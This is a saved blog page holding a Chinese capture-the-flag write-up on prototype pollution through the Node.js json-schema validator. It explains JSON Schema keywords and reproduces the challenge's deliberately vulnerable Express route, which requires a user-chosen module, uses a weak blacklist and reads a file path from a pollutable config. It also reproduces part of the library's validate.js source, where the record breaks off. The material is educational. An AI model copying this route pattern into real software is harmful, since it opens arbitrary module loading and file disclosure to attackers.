<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  <title>json_schema原型链污染(nodejs) | Hexo</title>

  <!-- keywords -->
  

  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="json_schema原型链污染json_schemajsonjson是表示javaScript对象表示法，是一种简单的数据交换格式，现在已经被运用于许多不涉及web环境中 json的数据结构 object 1&amp;#123;&quot;key1&quot;:&quot;value1&quot;,&quot;key2&quot;:&quot;value2&quot;&amp;#125; array 1[&amp;qu">
<meta property="og:type" content="article">
<meta property="og:title" content="json_schema原型链污染(nodejs)">
<meta property="og:url" content="http://example.com/2021/10/01/json_schema%E5%8E%9F%E5%9E%8B%E9%93%BE%E6%B1%A1%E6%9F%93/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="json_schema原型链污染json_schemajsonjson是表示javaScript对象表示法，是一种简单的数据交换格式，现在已经被运用于许多不涉及web环境中 json的数据结构 object 1&amp;#123;&quot;key1&quot;:&quot;value1&quot;,&quot;key2&quot;:&quot;value2&quot;&amp;#125; array 1[&amp;qu">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2021-09-30T16:00:00.000Z">
<meta property="article:modified_time" content="2021-10-21T11:49:35.418Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="nodejs">
<meta name="twitter:card" content="summary">
  
  
    <link rel="icon" href="http://7xkj1z.com1.z0.glb.clouddn.com/head.jpg">
  
  
<link rel="stylesheet" href="/css/style.css">

  
  

  
<script src="//cdn.bootcss.com/require.js/2.3.2/require.min.js"></script>

  
<script src="//cdn.bootcss.com/jquery/3.1.1/jquery.min.js"></script>


  
<meta name="generator" content="Hexo 5.4.0"><link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
</head>
<body>
  <div id="container">
    <div id="particles-js"></div>
    <div class="left-col">
    <div class="overlay"></div>
<div class="intrude-less">
	<header id="header" class="inner">
		<a href="/" class="profilepic">
			
			<img lazy-src="https://ss3.baidu.com/9fo3dSag_xI4khGko9WTAnF6hhy/zhidao/pic/item/e4dde71190ef76c61d3907c89516fdfaae51676e.jpg" class="js-avatar">
			
		</a>

		<hgroup>
		  <h1 class="header-author"><a href="/"></a></h1>
		</hgroup>

		

		
			<div class="switch-btn">
				<div class="icon">
					<div class="icon-ctn">
						<div class="icon-wrap icon-house" data-idx="0">
							<div class="birdhouse"></div>
							<div class="birdhouse_holes"></div>
						</div>
						<div class="icon-wrap icon-ribbon hide" data-idx="1">
							<div class="ribbon"></div>
						</div>
						
						<div class="icon-wrap icon-link hide" data-idx="2">
							<div class="loopback_l"></div>
							<div class="loopback_r"></div>
						</div>
						
						
					</div>
					
				</div>
				<div class="tips-box hide">
					<div class="tips-arrow"></div>
					<ul class="tips-inner">
						<li>菜单</li>
						<li>标签</li>
						
						<li>友情链接</li>
						
						
					</ul>
				</div>
			</div>
		

		<div class="switch-area">
			<div class="switch-wrap">
				<section class="switch-part switch-part1">
					<nav class="header-menu">
						<ul>
						
							<li><a href="/">主页</a></li>
				        
							<li><a href="/archives">所有文章</a></li>
				        
						</ul>
					</nav>
					<nav class="header-nav">
						<div class="social">
							
								<a class="rss" target="_blank" href="/atom.xml" title="rss">rss</a>
					        
						</div>
					</nav>
				</section>
				
				
				<section class="switch-part switch-part2">
					<div class="widget tagcloud" id="js-tagcloud">
						<a href="/tags/SSRF/" style="font-size: 11.43px;">SSRF</a> <a href="/tags/SSTI/" style="font-size: 12.86px;">SSTI</a> <a href="/tags/http/" style="font-size: 11.43px;">http</a> <a href="/tags/java/" style="font-size: 12.86px;">java</a> <a href="/tags/misc/" style="font-size: 11.43px;">misc</a> <a href="/tags/nodejs/" style="font-size: 12.86px;">nodejs</a> <a href="/tags/php%E7%89%B9%E6%80%A7/" style="font-size: 12.86px;">php特性</a> <a href="/tags/sql%E6%B3%A8%E5%85%A5/" style="font-size: 18.57px;">sql注入</a> <a href="/tags/ssrf/" style="font-size: 12.86px;">ssrf</a> <a href="/tags/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/" style="font-size: 20px;">代码审计</a> <a href="/tags/%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/" style="font-size: 15.71px;">命令执行</a> <a href="/tags/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/" style="font-size: 11.43px;">文件上传</a> <a href="/tags/%E6%96%87%E4%BB%B6%E6%B3%84%E9%9C%B2%E5%8F%8A%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/" style="font-size: 10px;">文件泄露及代码审计</a> <a href="/tags/%E6%A1%86%E6%9E%B6/" style="font-size: 11.43px;">框架</a> <a href="/tags/%E6%A8%A1%E6%9D%BF/" style="font-size: 14.29px;">模板</a> <a href="/tags/%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5/" style="font-size: 10px;">模板注入</a> <a href="/tags/%E7%88%86%E7%A0%B4/" style="font-size: 10px;">爆破</a> <a href="/tags/%E8%84%9A%E6%9C%AC%E7%BC%96%E5%86%99/" style="font-size: 17.14px;">脚本编写</a>
					</div>
				</section>
				
				
				
				<section class="switch-part switch-part3">
					<div id="js-friends">
					
			          <a target="_blank" class="main-nav-link switch-friends-link" href="https://github.com/smackgg/hexo-theme-smackdown">smackdown</a>
			        
			        </div>
				</section>
				

				
			</div>
		</div>
	</header>				
</div>
    </div>
    <div class="mid-col">
      <nav id="mobile-nav">
  	<div class="overlay">
  		<div class="slider-trigger"></div>
  		<h1 class="header-author js-mobile-header hide"></h1>
  	</div>
	<div class="intrude-less">
		<header id="header" class="inner">
			<div class="profilepic">
				<img lazy-src="https://ss3.baidu.com/9fo3dSag_xI4khGko9WTAnF6hhy/zhidao/pic/item/e4dde71190ef76c61d3907c89516fdfaae51676e.jpg" class="js-avatar">
			</div>
			<hgroup>
			  <h1 class="header-author"></h1>
			</hgroup>
			
			<nav class="header-menu">
				<ul>
				
					<li><a href="/">主页</a></li>
		        
					<li><a href="/archives">所有文章</a></li>
		        
		        <div class="clearfix"></div>
				</ul>
			</nav>
			<nav class="header-nav">
				<div class="social">
					
						<a class="rss" target="_blank" href="/atom.xml" title="rss">rss</a>
			        
				</div>
			</nav>
		</header>				
	</div>
</nav>
      <div class="body-wrap"><article id="post-json_schema原型链污染" class="article article-type-post" itemscope itemprop="blogPost">
  
    <div class="article-meta">
      <a href="/2021/10/01/json_schema%E5%8E%9F%E5%9E%8B%E9%93%BE%E6%B1%A1%E6%9F%93/" class="article-date">
  	<time datetime="2021-09-30T16:00:00.000Z" itemprop="datePublished">2021-10-01</time>
</a>
    </div>
  
  <div class="article-inner">
    
      <input type="hidden" class="isFancy" />
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      json_schema原型链污染(nodejs)
      
    </h1>
  

      </header>
      
      <div class="article-info article-info-post">
        
	<div class="article-tag tagcloud">
		<ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/nodejs/" rel="tag">nodejs</a></li></ul>
	</div>

        

        
        <div class="clearfix"></div>
      </div>
      
    
    <div class="article-entry" itemprop="articleBody">
      
        <h1 id="json-schema原型链污染"><a href="#json-schema原型链污染" class="headerlink" title="json_schema原型链污染"></a>json_schema原型链污染</h1><h2 id="json-schema"><a href="#json-schema" class="headerlink" title="json_schema"></a>json_schema</h2><h3 id="json"><a href="#json" class="headerlink" title="json"></a>json</h3><p>json是表示javaScript对象表示法，是一种简单的数据交换格式，现在已经被运用于许多不涉及web环境中</p>
<h4 id="json的数据结构"><a href="#json的数据结构" class="headerlink" title="json的数据结构"></a>json的数据结构</h4><ol>
<li><p>object</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&quot;key1&quot;:&quot;value1&quot;,&quot;key2&quot;:&quot;value2&quot;&#125;</span><br></pre></td></tr></table></figure></li>
<li><p>array</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[&quot;first&quot;,&quot;secode&quot;,&quot;third&quot;]</span><br></pre></td></tr></table></figure></li>
<li><p>number</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">42</span><br></pre></td></tr></table></figure></li>
<li><p>string</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&quot;this is a string&quot;</span><br></pre></td></tr></table></figure></li>
<li><p>boolean</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">true</span><br><span class="line">false</span><br></pre></td></tr></table></figure></li>
<li><p>null</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">null</span><br></pre></td></tr></table></figure></li>
</ol>
<p>使用这些简单的数据类型可以表示各种结构化数据，以下为用json以不同的方式表示一个人的信息</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">&#123;</span><br><span class="line">  &quot;name&quot;: &quot;George Washington&quot;,</span><br><span class="line">  &quot;birthday&quot;: &quot;February 22, 1732&quot;,</span><br><span class="line">  &quot;address&quot;: &quot;Mount Vernon, Virginia, United States&quot;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">&#123;</span><br><span class="line">  &quot;first_name&quot;: &quot;George&quot;,</span><br><span class="line">  &quot;last_name&quot;: &quot;Washington&quot;,</span><br><span class="line">  &quot;birthday&quot;: &quot;1732-02-22&quot;,</span><br><span class="line">  &quot;address&quot;: &#123;</span><br><span class="line">    &quot;street_address&quot;: &quot;3200 Mount Vernon Memorial Highway&quot;,</span><br><span class="line">    &quot;city&quot;: &quot;Mount Vernon&quot;,</span><br><span class="line">    &quot;state&quot;: &quot;Virginia&quot;,</span><br><span class="line">    &quot;country&quot;: &quot;United States&quot;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>而json_schema就是让应用程序知道该json记录的组织形式，下面就是上面json结构的数据用json_schema结构表达的实例</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">&#123;</span><br><span class="line">  &quot;type&quot;: &quot;object&quot;,</span><br><span class="line">  &quot;properties&quot;: &#123;</span><br><span class="line">    &quot;first_name&quot;: &#123; &quot;type&quot;: &quot;string&quot; &#125;,</span><br><span class="line">    &quot;last_name&quot;: &#123; &quot;type&quot;: &quot;string&quot; &#125;,</span><br><span class="line">    &quot;birthday&quot;: &#123; &quot;type&quot;: &quot;string&quot;, &quot;format&quot;: &quot;date&quot; &#125;,</span><br><span class="line">    &quot;address&quot;: &#123;</span><br><span class="line">      &quot;type&quot;: &quot;object&quot;,</span><br><span class="line">      &quot;properties&quot;: &#123;</span><br><span class="line">        &quot;street_address&quot;: &#123; &quot;type&quot;: &quot;string&quot; &#125;,</span><br><span class="line">        &quot;city&quot;: &#123; &quot;type&quot;: &quot;string&quot; &#125;,</span><br><span class="line">        &quot;state&quot;: &#123; &quot;type&quot;: &quot;string&quot; &#125;,</span><br><span class="line">        &quot;country&quot;: &#123; &quot;type&quot; : &quot;string&quot; &#125;</span><br><span class="line">      &#125;</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>由以上例子，我们可以知道json_schema是用json编写的，它本身的数据，是描述其它数据结构的格式声明，而且会自动验证数据，但是由于json_schema不可以包含任意代码，数据元素之间的关系存在某些不能表达的约束，所以验证阶段有了两个级别，分别是schema级别和语义级别</p>
<h4 id="json模式的规范"><a href="#json模式的规范" class="headerlink" title="json模式的规范"></a>json模式的规范</h4><p>实例</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">表示应用于json模式的json文档</span><br></pre></td></tr></table></figure>

<p>模式关键字</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">一个json模式必须是一个对象或布尔值，而应用于实例的对象属性则称为关键字或模式关键字</span><br></pre></td></tr></table></figure>

<p>验证关键字</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">json模式可用于要求给定的实例满足一定数量的条件，而用于断言这些条件的关键字则被称为验证关键字</span><br></pre></td></tr></table></figure>

<p>而验证关键字有很多种，这里主要注重对象的验证关键字的properties和additionalProperties</p>
<h5 id="properties"><a href="#properties" class="headerlink" title="properties"></a>properties</h5><p>此关键字的值必须是一个对象，这个对象中的每一个值都必须是一个有效的json模式，而且是用来验证对象实例中的子实例，而不是验证这个对象实例本身，对于同时出现在实例和作为该关键字的值中的名称的每个名称，该名称的子实例成功通过对应模式的验证</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">&#123;</span><br><span class="line">  &quot;type&quot;: &quot;object&quot;,</span><br><span class="line">  &quot;properties&quot;: &#123;</span><br><span class="line">    &quot;name&quot;: &#123;</span><br><span class="line">      &quot;type&quot;: &quot;string&quot;</span><br><span class="line">    &#125;,</span><br><span class="line">    &quot;age&quot;: &#123;</span><br><span class="line">      &quot;type&quot;: &quot;number&quot;</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<h4 id="additionalProperties"><a href="#additionalProperties" class="headerlink" title="additionalProperties"></a>additionalProperties</h4><p>此关键字的值必须是一个有效的json模式或一个布尔值，用来验证对象实例中的子实例，而不是验证这个对象实例本身，而且只验证实例中名称即不匹配properties中的任何名，也不匹配patternProperties中的任何正则表达式的元素的值</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line">&#123;</span><br><span class="line">    &quot;type&quot;: &quot;object&quot;,</span><br><span class="line">    &quot;properties&quot;: &#123;</span><br><span class="line">        &quot;_name&quot;: &#123;</span><br><span class="line">            &quot;type&quot;: &quot;string&quot;</span><br><span class="line">        &#125;,</span><br><span class="line">        &quot;age_&quot;: &#123;</span><br><span class="line">            &quot;type&quot;: &quot;number&quot;</span><br><span class="line">        &#125;,</span><br><span class="line">        &quot;salary&quot;: &#123;</span><br><span class="line">            &quot;type&quot;: &quot;number&quot;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;,</span><br><span class="line">    &quot;required&quot;: [</span><br><span class="line">        &quot;_name&quot;,</span><br><span class="line">        &quot;age_&quot;</span><br><span class="line">    ],</span><br><span class="line">    &quot;patternProperties&quot;: &#123;</span><br><span class="line">        &quot;^_&quot;: &#123;</span><br><span class="line">            &quot;minLength&quot;: 3</span><br><span class="line">        &#125;,</span><br><span class="line">        &quot;_$&quot;: &#123;</span><br><span class="line">            &quot;multipleOf&quot;: 10</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;,</span><br><span class="line">    &quot;additionalProperties&quot;: &#123;</span><br><span class="line">        &quot;type&quot;: [&quot;string&quot;, &quot;number&quot;],</span><br><span class="line">        &quot;enum&quot;: [&#x27;SQA&#x27;, &quot;R&amp;D&quot;, &quot;IMP&quot;]</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>[json_schema详细][<a target="_blank" rel="noopener" href="https://blog.csdn.net/swinfans/article/details/89231247]">https://blog.csdn.net/swinfans/article/details/89231247]</a></p>
<h2 id="实例-绿城杯Looking-for-treasure"><a href="#实例-绿城杯Looking-for-treasure" class="headerlink" title="实例(绿城杯Looking for treasure)"></a>实例(绿城杯Looking for treasure)</h2><p>打开页面，查看页面源码，发现一个可疑点</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/source.zip</span><br></pre></td></tr></table></figure>
<p>可以得到config.js文件<br>config.js</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line">module.exports = function(app, fs, lodash)&#123;</span><br><span class="line">    app.get(&#x27;/config&#x27;, function(req, res, next) &#123;</span><br><span class="line">        let config = res.locals.config;</span><br><span class="line">        let content = JSON.parse(fs.readFileSync(config.filepath).toString())</span><br><span class="line">        res.json(content);</span><br><span class="line">    &#125;);</span><br><span class="line"></span><br><span class="line">    app.post(&#x27;/validated/:library?/:method?&#x27;, function(req, res, next) &#123;</span><br><span class="line">        let config = res.locals.config;</span><br><span class="line">        if (!req.params.library || req.params.library.match(/vm/i)|| req.params.library.match(/../i)|| req.params.library.match(/%2f/i)|| req.params.library.match(/%2F/i)|| req.params.library.match(/\//i)) req.params.library = &quot;json-schema&quot;</span><br><span class="line">        if (!req.params.method) req.params.method = &quot;validate&quot;</span><br><span class="line"></span><br><span class="line">        let json_library = require(req.params.library)</span><br><span class="line">        let valid = json_library[req.params.method](req.body)</span><br><span class="line">        if (!valid) &#123;</span><br><span class="line">            res.send(&quot;validator failed&quot;);</span><br><span class="line">            return</span><br><span class="line">        &#125;</span><br><span class="line">        let p;</span><br><span class="line">        if (config.path) &#123;</span><br><span class="line">            p = config.path;</span><br><span class="line">        &#125; else if (config.filepath) &#123;</span><br><span class="line">            p = config.filepath;</span><br><span class="line">        &#125; else &#123;</span><br><span class="line">            p = &quot;config.json&quot;</span><br><span class="line">        &#125;</span><br><span class="line">        let content = fs.readFileSync(p).toString()</span><br><span class="line">        try &#123;</span><br><span class="line">            content = JSON.parse(content)</span><br><span class="line">            if (lodash.isEqual(req.body, content))</span><br><span class="line">                res.json(content)</span><br><span class="line">            else</span><br><span class="line">                res.send(&#123; &quot;validator&quot;: valid, &quot;content&quot; : content, &quot;log&quot;: &quot;wrong content&quot;&#125;)</span><br><span class="line">        &#125; catch &#123;</span><br><span class="line">            res.send(&#123; &quot;validator&quot;: valid, &quot;content&quot; : content&#125;)</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;)</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>从源码中我们可以看见</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">req.params.library = &quot;json-schema&quot;</span><br></pre></td></tr></table></figure>
<p>可以判断是json_schema，然后我们从上面可知道，json_schema会自动验证数据，所以我们下载json_schema的源码，然后看validate.js文件</p>
<p>validate.js文件</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br><span class="line">176</span><br><span class="line">177</span><br><span class="line">178</span><br><span class="line">179</span><br><span class="line">180</span><br><span class="line">181</span><br><span class="line">182</span><br><span class="line">183</span><br><span class="line">184</span><br><span class="line">185</span><br><span class="line">186</span><br><span class="line">187</span><br><span class="line">188</span><br><span class="line">189</span><br><span class="line">190</span><br><span class="line">191</span><br><span class="line">192</span><br><span class="line">193</span><br><span class="line">194</span><br><span class="line">195</span><br><span class="line">196</span><br><span class="line">197</span><br><span class="line">198</span><br><span class="line">199</span><br><span class="line">200</span><br><span class="line">201</span><br><span class="line">202</span><br><span class="line">203</span><br><span class="line">204</span><br><span class="line">205</span><br><span class="line">206</span><br><span class="line">207</span><br><span class="line">208</span><br><span class="line">209</span><br><span class="line">210</span><br><span class="line">211</span><br><span class="line">212</span><br><span class="line">213</span><br><span class="line">214</span><br><span class="line">215</span><br><span class="line">216</span><br><span class="line">217</span><br><span class="line">218</span><br><span class="line">219</span><br><span class="line">220</span><br><span class="line">221</span><br><span class="line">222</span><br><span class="line">223</span><br><span class="line">224</span><br><span class="line">225</span><br><span class="line">226</span><br><span class="line">227</span><br><span class="line">228</span><br><span class="line">229</span><br><span class="line">230</span><br><span class="line">231</span><br><span class="line">232</span><br><span class="line">233</span><br><span class="line">234</span><br><span class="line">235</span><br><span class="line">236</span><br><span class="line">237</span><br><span class="line">238</span><br><span class="line">239</span><br><span class="line">240</span><br><span class="line">241</span><br><span class="line">242</span><br><span class="line">243</span><br><span class="line">244</span><br><span class="line">245</span><br><span class="line">246</span><br><span class="line">247</span><br><span class="line">248</span><br><span class="line">249</span><br><span class="line">250</span><br><span class="line">251</span><br><span class="line">252</span><br><span class="line">253</span><br><span class="line">254</span><br><span class="line">255</span><br><span class="line">256</span><br><span class="line">257</span><br><span class="line">258</span><br><span class="line">259</span><br><span class="line">260</span><br><span class="line">261</span><br><span class="line">262</span><br><span class="line">263</span><br><span class="line">264</span><br><span class="line">265</span><br><span class="line">266</span><br><span class="line">267</span><br><span class="line">268</span><br><span class="line">269</span><br><span class="line">270</span><br><span class="line">271</span><br></pre></td><td class="code"><pre><span class="line">/**</span><br><span class="line"> * JSONSchema Validator - Validates JavaScript objects using JSON Schemas</span><br><span class="line"> *	(http://www.json.com/json-schema-proposal/)</span><br><span class="line"> * Licensed under AFL-2.1 OR BSD-3-Clause</span><br><span class="line">To use the validator call the validate function with an instance object and an optional schema object.</span><br><span class="line">If a schema is provided, it will be used to validate. If the instance object refers to a schema (self-validating),</span><br><span class="line">that schema will be used to validate and the schema parameter is not necessary (if both exist,</span><br><span class="line">both validations will occur).</span><br><span class="line">The validate method will return an array of validation errors. If there are no errors, then an</span><br><span class="line">empty list will be returned. A validation error will have two properties:</span><br><span class="line">&quot;property&quot; which indicates which property had the error</span><br><span class="line">&quot;message&quot; which indicates what the error was</span><br><span class="line"> */</span><br><span class="line">(function (root, factory) &#123;</span><br><span class="line">    if (typeof define === &#x27;function&#x27; &amp;&amp; define.amd) &#123;</span><br><span class="line">        // AMD. Register as an anonymous module.</span><br><span class="line">        define([], function () &#123;</span><br><span class="line">            return factory();</span><br><span class="line">        &#125;);</span><br><span class="line">    &#125; else if (typeof module === &#x27;object&#x27; &amp;&amp; module.exports) &#123;</span><br><span class="line">        // Node. Does not work with strict CommonJS, but</span><br><span class="line">        // only CommonJS-like environments that support module.exports,</span><br><span class="line">        // like Node.</span><br><span class="line">        module.exports = factory();</span><br><span class="line">    &#125; else &#123;</span><br><span class="line">        // Browser globals</span><br><span class="line">        root.jsonSchema = factory();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;(this, function () &#123;// setup primitive classes to be JSON Schema types</span><br><span class="line">var exports = validate</span><br><span class="line">exports.Integer = &#123;type:&quot;integer&quot;&#125;;</span><br><span class="line">var primitiveConstructors = &#123;</span><br><span class="line">	String: String,</span><br><span class="line">	Boolean: Boolean,</span><br><span class="line">	Number: Number,</span><br><span class="line">	Object: Object,</span><br><span class="line">	Array: Array,</span><br><span class="line">	Date: Date</span><br><span class="line">&#125;</span><br><span class="line">exports.validate = validate;</span><br><span class="line">function validate(/*Any*/instance,/*Object*/schema) &#123;</span><br><span class="line">		// Summary:</span><br><span class="line">		//  	To use the validator call JSONSchema.validate with an instance object and an optional schema object.</span><br><span class="line">		// 		If a schema is provided, it will be used to validate. If the instance object refers to a schema (self-validating),</span><br><span class="line">		// 		that schema will be used to validate and the schema parameter is not necessary (if both exist,</span><br><span class="line">		// 		both validations will occur).</span><br><span class="line">		// 		The validate method will return an object with two properties:</span><br><span class="line">		// 			valid: A boolean indicating if the instance is valid by the schema</span><br><span class="line">		// 			errors: An array of validation errors. If there are no errors, then an</span><br><span class="line">		// 					empty list will be returned. A validation error will have two properties:</span><br><span class="line">		// 						property: which indicates which property had the error</span><br><span 